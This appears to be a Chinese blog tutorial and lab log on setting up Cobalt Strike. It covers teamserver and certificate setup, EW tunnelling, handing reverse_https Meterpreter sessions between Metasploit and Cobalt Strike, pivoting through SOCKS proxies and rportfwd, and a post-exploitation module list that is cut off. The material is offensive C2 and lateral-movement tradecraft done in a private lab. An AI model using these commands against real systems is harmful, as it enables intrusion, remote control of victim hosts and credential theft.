2. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*

复制代码

该指令参考：
JVM调优总结 -Xms -Xmx -Xmn -Xss - 李克华 - 博客园 (cnblogs.com)
虚拟机配置参数 - 走看看 (zoukankan.com)

1. # 指令一一拆解：
   
2. java
   
3. # 配置并行收集器的线程数，即：同时多少个线程一起进行垃圾回收。此值最好配置与处理器数目相等。
   
4. -XX:ParallelGCThreads=4
   
5. 
   
6. # cobaltstrike自带的参数
   
7. -Dcobaltstrike.server_port=50050
   
8. -Djavax.net.ssl.keyStore=./cobaltstrike.store
   
9. -Djavax.net.ssl.keyStorePassword=123456
   
10. 
    
11. # 选择Hotspot Server JVM，64位jdk只支持server VM.这个参数是隐含的，即默认设置
    
12. -server
    
13. # 启用java堆优化，基于RAM和CPU的配置通过设置各种参数使其跟适合带有密集分配内存的长时间任务的分配，默认关闭的
    
14. -XX:+AggressiveHeap
    
15. # 配置年老代垃圾收集方式为并行收集。JDK6.0支持对年老代并行收集。
    
16. -XX:+UseParallelGC
    
17. 
    
18. # 指定server.TeamServer函数加载的文件路径，即当面目录下的cobaltstrike.jar文件，完成CS服务端的启动
    
19. -classpath ./cobaltstrike.jar server.TeamServer $*
    

复制代码

（2）客户端启动文件：start

1. java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar

复制代码

拆解分析：参考链接：
JVM调优总结 -Xms -Xmx -Xmn -Xss - 李克华 - 博客园 (cnblogs.com)
Java命令行参数详解_御风而行-CSDN博客_java命令行参数

1. java
   
2. # 配置并行收集器的线程数，即：同时多少个线程一起进行垃圾回收。此值最好配置与处理器数目相等。
   
3. -XX:ParallelGCThreads=4
   
4. # 启用java堆优化，基于RAM和CPU的配置通过设置各种参数使其跟适合带有密集分配内存的长时间任务的分配，默认关闭的
   
5. -XX:+AggressiveHeap
   
6. # 配置年老代垃圾收集方式为并行收集。JDK6.0支持对年老代并行收集。
   
7. -XX:+UseParallelGC
   
8. #设置JVM促使内存为512Mm。此值可以设置与-Xmx相同，以避免每次垃圾回收完成后JVM重新分配内存。
   
9. -Xms512M
   
10. # 设置JVM最大可用内存为1024M。
    
11. -Xmx1024M
    
12. # 启动该文件
    
13. -jar cobaltstrike.jar

复制代码

原版的teamserver文件如下所示：

1. #!/bin/bash
   
2. #
   
3. # Start Cobalt Strike Team Server
   
4. #
   
5. 
   
6. # make pretty looking messages (thanks Carlos)
   
7. function print_good () {
   
8.     echo -e "\x1B[01;32m[+]\x1B[0m $1"
   
9. }
   
10. 
    
11. function print_error () {
    
12.     echo -e "\x1B[01;31m[-]\x1B[0m $1"
    
13. }
    
14. 
    
15. function print_info () {
    
16.     echo -e "\x1B[01;34m[*]\x1B[0m $1"
    
17. }
    
18. 
    
19. # check that we're r00t，检查执行用户是否是root权限
    
20. if [ $UID -ne 0 ]; then
    
21.     print_error "Superuser privileges are required to run the team server"
    
22.     exit
    
23. fi
    
24. 
    
25. # check if java is available...
    
26. if [ $(command -v java) ]; then
    
27.     true
    
28. else
    
29.     print_error "java is not in \$PATH"
    
30.     echo "    is Java installed?"
    
31.     exit
    
32. fi
    
33. 
    
34. # check if keytool is available...
    
35. if [ $(command -v keytool) ]; then
    
36.     true
    
37. else
    
38.     print_error "keytool is not in \$PATH"
    
39.     echo "    install the Java Developer Kit"
    
40.     exit
    
41. fi
    
42. 
    
43. # generate a certificate
    
44.     # naturally you're welcome to replace this step with your own permanent certificate.
    
45.     # just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
    
46.     # -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
    
47.     # an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
    
48.     # is printed so users may have a chance to verify they're not being owned.
    
49. if [ -e ./cobaltstrike.store ]; then
    
50.     print_info "Will use existing X509 certificate and keystore (for SSL)"
    
51. else
    
52.     print_info "Generating X509 certificate and keystore (for SSL)"
    
53.     keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
    
54. fi
    
55. 
    
56. # start the team server.
    
57. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*

复制代码

3.生成自己的证书文件
3.1.修改密码--生成证书

（1）生成证书（修改密码）

1. # 原本的
   
2. keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
   
3. 
   
4. # 修改后
   
5. # 注意：storepass和keypass必须一样
   
6. keytool -keystore ./cobaltstrike.store -storepass 666666 -keypass 666666 -genkey -keyalg RSA -alias cobaltstrike -dname  "CN=xor0ne, OU=test, O=cobaltstrike, L=test, S=test, C=test"

复制代码

执行成功：在当前目录下生成cobaltstrike.store文件

​

（2）服务端启动
首先修稿启动文件：teamserver.bat

1. # 原本的teamserver文件
   
2. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
   
3. 
   
4. # 修改后
   
5. # -Dcobaltstrike.server_port=50050 默认端口，可自行修改
   
6. #  -Djavax.net.ssl.keyStorePassword=666666
   
7.     java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=666666 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer %*
   
8. 点击并拖拽以移动

复制代码

服务端启动：
teamserver.bat 192.168.10.21 password

​

（3）客户端启动
将服务器端生成的cobaltstrike.store文件复制到客户端目录中去，然后执行客户端start.sh。成功。

​

3.2.直接生成PKCS12证书

1. 方法一：
   
2. 已经生成一个非pkcs12格式的证书，将此证书通过如下命令载入
   
3. 
   
4. keytool -importkeystore -srckeystore ./cobaltstrike.store -destkeystore ./cobaltstrike.store -deststoretype pkcs12
   
5. 点击并拖拽以移动
   
6. 
   
7. 
   
8. 方法二：
   
9. 直接生成PKCS12证书
   
10. 
    
11. keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=ChaoYang, C=CN" -storetype PKCS12

复制代码

​

4.附录：出现的问题如下：
问题1：生成.store文件错误keytool 错误: java.io.IOException: Keystore was tampered with, or password was incorrect

​

原因：与当前目录的文件冲突
解决办法：删除或者重命名当前目录下的cobaltstrike.store文件。

问题2：服务端启动错误

报错如下：（这只是一种，实际情况有好几种，就不一一列举了。）

​

原因：

• 生成cobaltstrike.store文件时，两个密钥没有保持一致。
• 启动文件的teamserver对应的指令忘记修改了。最后一行的对应keyStorePassword也需要修改。
  

1. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=666666 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer %*

复制代码

​

​

Xor0ne

【20220106】​
​







0x01 EW-二层代理昨天用porttunnel尝试不成功，今天偶然用ew尝试成功了。
环境如下：

1. C:windows10：cobaltstrike服务器端，192.168.0.106
   
2. A：win7：双网卡：192.168.159.6 和 192.168.59.128
   
3. B：win7-2（内网）：192.168.59.130

复制代码

实验如下所示：

​
A.在C主机的cobaltstrike创建一个监听器1，用来连接的。（建议使用https。我这里一不小心使用了http）




​
B.上传ew到右侧A主机，运行下列命令：创建隧道。

1. # ew_for_Win.exe -s lcx_tran -l 监听端口 -f 指定得内网地址 -g 内网某服务端口
   
2. 
   
3. # 将主机A的1080请求交给主机C(0.106)的1001端口
   
4. 
   
5. ew -s lcx_tran -l 1080 -f 192.168.0.106 -g 1001

复制代码

说明：该命令意思是将本机1080端口收到的代理请求转交给B主机（192.168.0.106）的1001端口。
同时在主机C的cobaltstrike上在创建一个监听器2，用于内网主机B反弹主机A。
​


C.通过监听器2生成一个可执行文件test01.exe，放在内网机器B上，让其执行。成功上线。
​
主机A的隧道情况如下所示：


​


0x02 MSF和cobaltstrike流量派生
1.cobalt strike->msf
（1）reverse_https（失败）
A.msf创建监听（https协议）

1. msf6 > use exploit/multi/handler
   
2. [*] Using configured payload generic/shell_reverse_tcp
   
3. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
   
4. payload => windows/meterpreter/reverse_http
   
5. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LHOST 192.168.159.7
   
6. LHOST => 192.168.159.7
   
7. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LPORT 2000
   
8. LPORT => 2000
   
9. msf6 exploit(multi/handler) > run -j

复制代码

​
B.cs新建一个监听器，地址为msf地址，端口为msf的监听端口


​
然后在CS上对受害机增加会话。​

C.msf无法上线。。。



（2）reverse_https（成功）
A.msf创建监听（https协议）

1. msf6 > use exploit/multi/handler
   
2. [*] Using configured payload generic/shell_reverse_tcp
   
3. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
   
4. payload => windows/meterpreter/reverse_https
   
5. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LHOST 192.168.159.7
   
6. LHOST => 192.168.159.7
   
7. msf6 exploit(multi/handler) > <span class="hljs-built_in">set</span> LPORT 3000
   
8. LPORT => 3000
   
9. msf6 exploit(multi/handler) > run -j

复制代码

​

B.cs新建一个监听器，地址为msf地址，端口为msf的监听端口
​
  然后在CS上对受害机增加会话。​



C.msf收到CS的派生会话，输入background即可返回msf exploit(multi/handler)。
​



2.Msf->cobalt strike
如果Metasploit已经获取到了一个会话，可以通过payload_inject模块进行会话派生,将会话传递到Cobaltstrike。
（1）reverse_http（成功）
A.首先在cs中开启监听
​



B.msf配置，通过msf的payload_inject模块将会话派生到cobalt strike里面。

1. use exploit/windows/local/payload_inject
   
2. <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_http
   
3. <span class="hljs-built_in">set</span> DisablePayloadHandler <span class="hljs-literal">true</span>   <span class="hljs-comment">#默认情况下，payload_inject执行之后会在本地产生一个新的handler，由于我们已经有了一个，所以不需要在产生一个，所以这里我们设置为true</span>
   
4. <span class="hljs-built_in">set</span> lhost 192.168.10.18               <span class="hljs-comment">#cobaltstrike监听的ip</span>
   
5. <span class="hljs-built_in">set</span> lport 4000                 <span class="hljs-comment">#cobaltstrike监听的端口 </span>
   
6. <span class="hljs-built_in">set</span> session 1                   <span class="hljs-comment">#这里是获得的session的id</span>
   
7. exploit

复制代码

​
C.cobaltstrike成功上线。
​


（2）reverse_https（成功）A.首先在cs中开启监听
​



B.msf配置，通过msf的payload_inject模块将会话派生到cobalt strike里面。

1. use exploit/windows/local/payload_inject
   
2. <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_https
   
3. <span class="hljs-built_in">set</span> DisablePayloadHandler <span class="hljs-literal">true</span>   <span class="hljs-comment">#默认情况下，payload_inject执行之后会在本地产生一个新的handler，由于我们已经有了一个，所以不需要在产生一个，所以这里我们设置为true</span>
   
4. <span class="hljs-built_in">set</span> lhost 192.168.10.18               <span class="hljs-comment">#cobaltstrike监听的ip</span>
   
5. <span class="hljs-built_in">set</span> lport 5000                 <span class="hljs-comment">#cobaltstrike监听的端口 </span>
   
6. <span class="hljs-built_in">set</span> session 1                   <span class="hljs-comment">#这里是获得的session的id</span>
   
7. exploit

复制代码

​

C.cobalt strike成功上线。
​


附录：1.监听器学习
​

1. [1]HTTP Hosts
   
2. [2]HTTP Host(Stager)
   
3. [3]Profile
   
4. [4]HTTP Port(C2)
   
5. [5]HTTP Port(Bind)
   
6. [6]HTTP Host Header
   
7. [7]HTTP Proxy

复制代码

（1）端口port(C2)和port(Bind)的区别

1. [4]port(C2)：在cobaltstrike服务器上会默认创建这个端口（仅填一个端口）
   
2. [5]Port(Bind)：在cobaltstrike服务器上创建Bind端口，而不创建C2端口（如果同时填了的话）

复制代码

我们创建两个cobaltstrike尝试一下。（与地址无关，即可填cobaltstrike的ip也可填其他的ip）

1. test01:[4]port(C2)：1234----[5]Port(Bind):空
   
2. test02:[4]port(C2)：2234----[5]Port(Bind):3235

复制代码

​
​

查看cobaltstrike的端口开放情况：

1. <span class="hljs-meta"># cobaltstrike的监听器情况如下：</span>
   
2. test01:[<span class="hljs-number">4</span>]<span class="hljs-built_in">port</span>(C2)：<span class="hljs-number">1234</span>----[<span class="hljs-number">5</span>]<span class="hljs-built_in">Port</span>(Bind):空
   
3. test02:[<span class="hljs-number">4</span>]<span class="hljs-built_in">port</span>(C2)：<span class="hljs-number">2234</span>----[<span class="hljs-number">5</span>]<span class="hljs-built_in">Port</span>(Bind):<span class="hljs-number">3235</span>

复制代码

​

那么这两个我们可以怎么去用呢？我们以监听器test02为例。

1. test02:[4]port(C2)：2234----[5]Port(Bind):3235
   
2. 假设监听器test02填写的是主机A的ip为192.168.59.128
   
3. cobaltstrike主机的ip为：192.168.0.106

复制代码

环境：

1. C:windows10：cobaltstrike服务器端，192.168.0.106
   
2. A：win7：双网卡：192.168.159.6 和 192.168.59.128
   
3. B：win7-2（内网）：192.168.59.130

复制代码

我们利用test02监听器去生成一个可执行文件，受害机B(内网)执行文件后，首先需要连接的是主机A（内网:192.168.59.128:2234），我们在A上添加一个隧道将来自2234的请求转发到cobaltstrike主机的3235端口即可。成功上线。
​
​



2.中转Pivoting中转的话主要分为3个。

1. [1] SOCKS Server <span class="hljs-comment"># 在cobaltstrike上开一个端口，作为SOCKS服务器端口</span>
   
2. [2] Listener
   
3. [3] Deploy VPN

复制代码

​

（1）SOCKS Server
参考链接：Cobalt Strike使用教程一 - 尚码园
通过 [beacon] → Pivoting → SOCKS Server 来在你的团队服务器上设置一个 SOCKS4a 代理服务
器。或者使用 socks 8080 命令来在端口 8080 上设置一个 SOCKS4a 代理服务器（或者任何其他你想选择的端口）。
要查看当前已经配置的 SOCKS 服务器，通过 View → Proxy Pivots 。
使用方法：我们以cobaltstrike作为服务器，然后利用ew连接隧道，这样便可以把内网的及其代理出来了。
环境：

1. C外网：cobaltstrike服务器：192.168.0.106
   
2. B外网：kali20201,metasploit的ip：192.168.0.194（桥接模式）
   
3. A内网：可访问外网C，但是C无法访问他（自建环境时可以把VMnet8给禁止）

复制代码

A.首先我们在C主机cobaltstrike上通过 [beacon] → Pivoting → SOCKS Server ，建立一个带代理服务器端口。
​
​




B.方法一：代理kali

在B主机上代理C，然后利用nmap进行端口扫描。
首选我们需要在B主机(kali2021)上编辑/etc/proxychains.conf 文件。

1. vim /etc/proxychains.conf
   
2. 
   
3. <span class="hljs-comment"># 添加sock4代理:socks4 cs的ip 代理服务器端口</span>
   
4. socks4 192.168.0.106 22222
   
5. <span class="hljs-comment"># 注释掉文件中的proxy_dns</span>

复制代码

​
​


使用proxychains代理扫描内网主机

1. proxychains nmap -sP 192.168.59.0/24

复制代码

（以下为网图，我本地失败了。。。）
​


C.方法二：经过隧道将整个msf带进目标内网
点击View->Proxy Pivots，选择Socks4a Proxy,点击Tunnel

1. setg Proxies socks4:192.168.0.106:22222

复制代码

​

打开msf对内网进行扫描。

1. msf6 > setg Proxies socks4:192.168.0.106:22222
   
2. Proxies => socks4:192.168.0.106:22222
   
3. msf6 > use auxiliary/scanner/portscan/tcp
   
4. msf6 auxiliary(scanner/portscan/tcp) > <span class="hljs-built_in">set</span> rhosts 192.168.59.128
   
5. rhosts => 192.168.59.128
   
6. msf6 auxiliary(scanner/portscan/tcp) > <span class="hljs-built_in">set</span> ports 80,3306,445
   
7. ports => 80,3306,445
   
8. msf6 auxiliary(scanner/portscan/tcp) > run
   
9. 
   
10. [*] 192.168.59.128:       - Scanned 1 of 1 hosts (100% complete)                                                                                                                                                                             
    
11. [*] Auxiliary module execution completed

复制代码

（我本地失败了，原因不明。。）
​


（2）Listener（rportfwd 命令）使用 rportfwd 命令来通过 Beacon 设置一个反向跳板。 rportfwd 命令会绑定失陷主机上的一个端
口。任何到此端口的连接将会导致你的 Cobalt Strike 服务器初始化一个到另一个主机和端口的连接并
中继这两个连接之间的流量。Cobalt Strike 通过 Beacon 隧道传输流量。 rportfwd 命令的语法是：

1. rportfwd [<span class="hljs-built_in">bind</span> port] [forward host] [forward port]

复制代码

使用 rportfwd stop [bind port] 停用反向端口转发。
利用web服务器的会话建立pivot监听器： pivot 监听器将绑定到指定会话上的侦听端口。假设我们已经弄到了一台web服务器A的session，发现web服务器后面发现有一台内网机器B，此时我们想要将这台内网机器B的端口通过web服务器转发给我们CS服务器，这时就需要利用到端口转发功能。

A.首先，对CS服务器上获取的web服务器A的session右键，建立一个pivod监听器：

​


点击建立pivot监听器后，出现的弹框其实只用改NAME，其他已经自动帮我们填充了，这里的host其实就是web服务器的IP。
​
​



B.接着利用这个pivot监听器创建一个攻击文件：
​


选择监听器。
​


C.执行该文件后回到CS服务器，就能看到已经完成端口转发了。
​


PS：如果中转机出现了问题，那么所中转的内网也将会有问题。
​


注意：这个Listener刚刚创建的时候，在中转机是查不到对应端口的，只有当内网主机连接后才会产生对应的端口。（实践所得，个人并不确定真实性质。）
​



3.Msf-后渗透模块

1. msf迁移进程 ：migrate pid
   
2. cs可以注入进程，但不可以迁移进程。

复制代码

查看后渗透载荷：
run 连续敲三下tab键。

1. <pre class="cke_widget_element" data-cke-widget-data="%7B%22classes%22%3Anull%2C%22lang%22%3A%22bash%22%2C%22code%22%3A%22meterpreter%20%3E%20run%5CnDisplay%20all%20522%20possibilities%3F%20(y%20or%20n)%5Cnrun%20arp_scanner%5Cnrun%20autoroute%5Cnrun%20checkvm%5Cnrun%20credcollect%5Cnrun%20domain_list_gen%5Cnrun%20dumplinks%5Cnrun%20duplicate%5Cnrun%20enum_chrome%5Cnrun%20enum_firefox%5Cnrun%20enum_logged_on_users%5Cnrun%20enum_powershell_env%5Cnrun%20enum_putty%5Cnrun%20enum_shares%5Cnrun%20enum_vmware%5Cnrun%20event_manager%5Cnrun%20exploit%2Fmulti%2Flocal%2Fallwinner_backdoor%5Cnrun%20exploit%2Fmulti%2Flocal%2Fmagnicomp_sysinfo_mcsiwrapper_priv_esc%5Cnrun%20exploit%2Fmulti%2Flocal%2Fxorg_x11_suid_server%5Cnrun%20exploit%2Fmulti%2Flocal%2Fxorg_x11_suid_server_modulepath%5Cnrun%20exploit%2Fwindows%2Flocal%2Fadobe_sandbox_adobecollabsync%5Cnrun%20exploit%2Fwindows%2Flocal%2Fagnitum_outpost_acs%5Cnrun%20exploit%2Fwindows%2Flocal%2Falpc_taskscheduler%5Cnrun%20exploit%2Fwindows%2Flocal%2Falways_install_elevated%5Cnrun%20exploit%2Fwindows%2Flocal%2Fanyconnect_lpe%5Cnrun%20exploit%2Fwindows%2Flocal%2Fapplocker_bypass%5Cnrun%20exploit%2Fwindows%2Flocal%2Fappxsvc_hard_link_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fask%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbits_ntlm_token_impersonation%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbthpan%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_comhijack%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_dotnet_profiler%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_eventvwr%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_fodhelper%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_injection%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_injection_winsxs%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_sdclt%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_silentcleanup%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_sluihijack%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_vbs%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_windows_store_filesys%5Cnrun%20exploit%2Fwindows%2Flocal%2Fbypassuac_windows_store_reg%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcapcom_sys_exec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcomahawk%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcurrent_user_psexec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2017_8464_lnk_lpe%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2018_8453_win32k_priv_esc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2019_1458_wizardopium%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_0668_service_tracing%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_0787_bits_arbitrary_file_move%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_0796_smbghost%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1048_printerdemon%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1054_drawiconex_lpe%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1313_system_orchestrator%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_1337_printerdemon%5Cnrun%20exploit%2Fwindows%2Flocal%2Fcve_2020_17136%5Cnrun%20exploit%2Fwindows%2Flocal%2Fdnsadmin_serverlevelplugindll%5Cnrun%20exploit%2Fwindows%2Flocal%2Fdocker_credential_wincred%5Cnrun%20exploit%2Fwindows%2Flocal%2Fdruva_insync_insynccphwnet64_rcp_type_5_priv_esc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fgog_galaxyclientservice_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fikeext_service%5Cnrun%20exploit%2Fwindows%2Flocal%2Fipass_launch_app%5Cnrun%20exploit%2Fwindows%2Flocal%2Flenovo_systemupdate%5Cnrun%20exploit%2Fwindows%2Flocal%2Fmov_ss%5Cnrun%20exploit%2Fwindows%2Flocal%2Fmqac_write%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms10_015_kitrap0d%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms10_092_schelevator%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms11_080_afdjoinleaf%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_005_hwnd_broadcast%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_053_schlamperei%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_081_track_popup_menu%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms13_097_ie_registry_symlink%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms14_009_ie_dfsvc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms14_058_track_popup_menu%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms14_070_tcpip_ioctl%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms15_004_tswbproxy%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms15_051_client_copy_image%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms15_078_atmfd_bof%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_014_wmi_recv_notif%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_016_webdav%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_032_secondary_logon_handle_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_075_reflection%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms16_075_reflection_juicy%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms18_8120_win32k_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fms_ndproxy%5Cnrun%20exploit%2Fwindows%2Flocal%2Fnovell_client_nicm%5Cnrun%20exploit%2Fwindows%2Flocal%2Fnovell_client_nwfs%5Cnrun%20exploit%2Fwindows%2Flocal%2Fntapphelpcachecontrol%5Cnrun%20exploit%2Fwindows%2Flocal%2Fntusermndragover%5Cnrun%20exploit%2Fwindows%2Flocal%2Fnvidia_nvsvc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpanda_psevents%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpayload_inject%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpersistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpersistence_image_exec_options%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpersistence_service%5Cnrun%20exploit%2Fwindows%2Flocal%2Fplantronics_hub_spokesupdateservice_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpowershell_cmd_upgrade%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpowershell_remoting%5Cnrun%20exploit%2Fwindows%2Flocal%2Fppr_flatten_rec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fps_persist%5Cnrun%20exploit%2Fwindows%2Flocal%2Fps_wmi_exec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fpxeexploit%5Cnrun%20exploit%2Fwindows%2Flocal%2Frazer_zwopenprocess%5Cnrun%20exploit%2Fwindows%2Flocal%2Fregistry_persistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fricoh_driver_privesc%5Cnrun%20exploit%2Fwindows%2Flocal%2Frun_as%5Cnrun%20exploit%2Fwindows%2Flocal%2Fs4u_persistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fservice_permissions%5Cnrun%20exploit%2Fwindows%2Flocal%2Funquoted_service_path%5Cnrun%20exploit%2Fwindows%2Flocal%2Fvirtual_box_guest_additions%5Cnrun%20exploit%2Fwindows%2Flocal%2Fvirtual_box_opengl_escape%5Cnrun%20exploit%2Fwindows%2Flocal%2Fvss_persistence%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwebexec%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwindscribe_windscribeservice_priv_esc%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwmi%5Cnrun%20exploit%2Fwindows%2Flocal%2Fwmi_persistence%5Cnrun%20file_collector%5Cnrun%20get_application_list%5Cnrun%20get_env%5Cnrun%20get_filezilla_creds%5Cnrun%20get_local_subnets%5Cnrun%20get_pidgin_creds%5Cnrun%20get_valid_community%5Cnrun%20getcountermeasure%5Cnrun%20getgui%5Cnrun%20gettelnet%5Cnrun%20getvncpw%5Cnrun%20hashdump%5Cnrun%20hostsedit%5Cnrun%20keylogrecorder%5Cnrun%20killav%5Cnrun%20metsvc%5Cnrun%20migrate%5Cnrun%20multi_console_command%5Cnrun%20multi_meter_inject%5Cnrun%20multicommand%5Cnrun%20multiscript%5Cnrun%20netenum%5Cnrun%20packetrecorder%5Cnrun%20panda_2007_pavsrv51%5Cnrun%20persistence%5Cnrun%20pml_driver_config%5Cnrun%20post%2Faix%2Fhashdump%5Cnrun%20post%2Fandroid%2Fcapture%2Fscreen%5Cnrun%20post%2Fandroid%2Fgather%2Fhashdump%5Cnrun%20post%2Fandroid%2Fgather%2Fsub_info%5Cnrun%20post%2Fandroid%2Fgather%2Fwireless_ap%5Cnrun%20post%2Fandroid%2Fmanage%2Fremove_lock%5Cnrun%20post%2Fandroid%2Fmanage%2Fremove_lock_root%5Cnrun%20post%2Fapple_ios%2Fgather%2Fios_image_gather%5Cnrun%20post%2Fapple_ios%2Fgather%2Fios_text_gather%5Cnrun%20post%2Fbsd%2Fgather%2Fhashdump%5Cnrun%20post%2Ffirefox%2Fgather%2Fcookies%5Cnrun%20post%2Ffirefox%2Fgather%2Fhistory%5Cnrun%20post%2Ffirefox%2Fgather%2Fpasswords%5Cnrun%20post%2Ffirefox%2Fgather%2Fxss%5Cnrun%20post%2Ffirefox%2Fmanage%2Fwebcam_chat%5Cnrun%20post%2Fhardware%2Fautomotive%2Fcan_flood%5Cnrun%20post%2Fhardware%2Fautomotive%2Fcanprobe%5Cnrun%20post%2Fhardware%2Fautomotive%2Fgetvinfo%5Cnrun%20post%2Fhardware%2Fautomotive%2Fidentifymodules%5Cnrun%20post%2Fhardware%2Fautomotive%2Fmalibu_overheat%5Cnrun%20post%2Fhardware%2Fautomotive%2Fmazda_ic_mover%5Cnrun%20post%2Fhardware%2Fautomotive%2Fpdt%5Cnrun%20post%2Fhardware%2Frftransceiver%2Frfpwnon%5Cnrun%20post%2Fhardware%2Frftransceiver%2Ftransmitter%5Cnrun%20post%2Fhardware%2Fzigbee%2Fzstumbler%5Cnrun%20post%2Flinux%2Fbusybox%2Fenum_connections%5Cnrun%20post%2Flinux%2Fbusybox%2Fenum_hosts%5Cnrun%20post%2Flinux%2Fbusybox%2Fjailbreak%5Cnrun%20post%2Flinux%2Fbusybox%2Fping_net%5Cnrun%20post%2Flinux%2Fbusybox%2Fset_dmz%5Cnrun%20post%2Flinux%2Fbusybox%2Fset_dns%5Cnrun%20post%2Flinux%2Fbusybox%2Fsmb_share_root%5Cnrun%20post%2Flinux%2Fbusybox%2Fwget_exec%5Cnrun%20post%2Flinux%2Fdos%2Fxen_420_dos%5Cnrun%20post%2Flinux%2Fg